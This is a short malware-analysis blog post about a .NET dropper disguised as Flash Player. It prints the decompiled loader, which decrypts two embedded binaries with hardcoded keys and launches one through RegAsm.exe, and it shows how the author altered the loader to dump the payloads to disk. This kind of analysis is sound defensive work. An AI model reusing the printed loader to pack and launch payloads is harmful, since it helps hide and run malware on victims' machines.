Analysis: Win32.af45ff354aaf65c450cf147194b0f746243361b1385abe580ba10246fee9bd66

I was browsing through Malware Bazaar and came across a Win32 Binary that hadn’t been tagged with anything specific, which piqued my interest it it

Grabbing the sample revealed a binary with a flash player logo, and detect it easy identified it as a .net binary.

I discovered a few interesting things by dropping the binary into DnSpy. The binary was a wrapped for 2 encrypted binaries bundled in the app’s resources, CLS.dlland Xola.exe

The app itself was just a really simple SymmetricAlgorithm decrypter that launches the decrypted binaries in a new thread

// Consol.Program
// Token: 0x06000001 RID: 1 RVA: 0x00002050 File Offset: 0x00000250
private static void Main()
{
    Thread.GetDomain().Load(hpCGGsxnBfkpZyTC.jjjjjj).GetType(hpCGGsxnBfkpZyTC.tttttt).GetMethod(hpCGGsxnBfkpZyTC.kkkk).Invoke(null, new object[]
    {
        hpCGGsxnBfkpZyTC.locationstart,
        hpCGGsxnBfkpZyTC.lastcode
    });
}

 

using System;
using System.IO;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;
using Consol;
using Microsoft.VisualBasic.CompilerServices;

// Token: 0x02000003 RID: 3
public static class hpCGGsxnBfkpZyTC
{
    // Token: 0x06000003 RID: 3 RVA: 0x000020A8 File Offset: 0x000002A8
    public static byte[] syam(byte[] B, string ikey)
    {
        SymmetricAlgorithm symmetricAlgorithm = SymmetricAlgorithm.Create();
        SHA256CryptoServiceProvider sha256CryptoServiceProvider = new SHA256CryptoServiceProvider();
        byte[] key = sha256CryptoServiceProvider.ComputeHash(Encoding.BigEndianUnicode.GetBytes(ikey));
        symmetricAlgorithm.Key = key;
        symmetricAlgorithm.Mode = CipherMode.ECB;
        return symmetricAlgorithm.CreateDecryptor().TransformFinalBlock(B, 0, B.Length);
    }

    // Token: 0x06000004 RID: 4 RVA: 0x000020F4 File Offset: 0x000002F4
    public static byte[] ExtractResource(string filename)
    {
        byte[] result;
        using (Stream manifestResourceStream = typeof(Program).Assembly.GetManifestResourceStream(filename))
        {
            if (manifestResourceStream == null)
            {
                result = null;
            }
            else
            {
                byte[] array = new byte[manifestResourceStream.Length];
                manifestResourceStream.Read(array, 0, array.Length);
                result = array;
            }
        }
        return result;
    }

    // Token: 0x04000001 RID: 1
    public static string locationstart = Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), "RegAsm.exe");

    // Token: 0x04000002 RID: 2
    public static byte[] lastcode = hpCGGsxnBfkpZyTC.syam(hpCGGsxnBfkpZyTC.ExtractResource("Xola.exe"), "ZiZ");

    // Token: 0x04000003 RID: 3
    public static byte[] jjjjjj = hpCGGsxnBfkpZyTC.syam(hpCGGsxnBfkpZyTC.ExtractResource("CLS.dll"), "جc吉尺O");

    // Token: 0x04000004 RID: 4
    public static string tttttt = Conversions.ToString("AZJCJfpyUsnAfJiyTLOifhLwQLhZwGQnrnOfJOnTpCiTDfBnyfynAAJxwhxnBJTLsQ.vrQBCQEUkZhMBwkZOZJQvLwhJxnADLpQChAphAJZfsMfxEiQLivpkxrTwsUwEkZMph");

    // Token: 0x04000005 RID: 5
    public static string kkkk = "yhxGkJfDMpTfiUkihOywMGfEhwUUQLLMnQOsEBvpnBEZUkExQhTyUQhJwkMJAisikT";
}

To keep things super simple and easy, I’m going to modify the hpCGGsxnBfkpZyTCclass to include a dump()function that will simply write the 2 binaries to the disk

public static void dump(string fileName, byte[] bytes)
{
    File.WriteAllBytes("C:\\Temp\\" + fileName, bytes);
}

Then modify the entry point to dump the binaries instead of running them

using System;

namespace Consol
{
    // Token: 0x02000002 RID: 2
    internal class Program
    {
        // Token: 0x06000001 RID: 1 RVA: 0x00002050 File Offset: 0x00000250
        private static void Main()
        {
            hpCGGsxnBfkpZyTC.dump("CLS.dll", hpCGGsxnBfkpZyTC.jjjjjj);
            hpCGGsxnBfkpZyTC.dump("Xola.exe", hpCGGsxnBfkpZyTC.lastcode);
        }
    }
}

The result? 2 freshly decrypted malware samples in C:\Temp

I’ll dig into the 2 binaries in a part 2 sometime, but for now I’ll leave it there 🙂

 

References

https://bazaar.abuse.ch/sample/af45ff354aaf65c450cf147194b0f746243361b1385abe580ba10246fee9bd66/

CLS.dll - https://www.virustotal.com/gui/file/5026b4d5a20d9bd7f07f111adbfdcdffa3423e83a1f5a982c1c34ad610eaa678/details
Xola.exe - https://www.virustotal.com/gui/file/f5e53da9273368bd53d088d573088865f80a318e9839a54214584c3eb98de003/details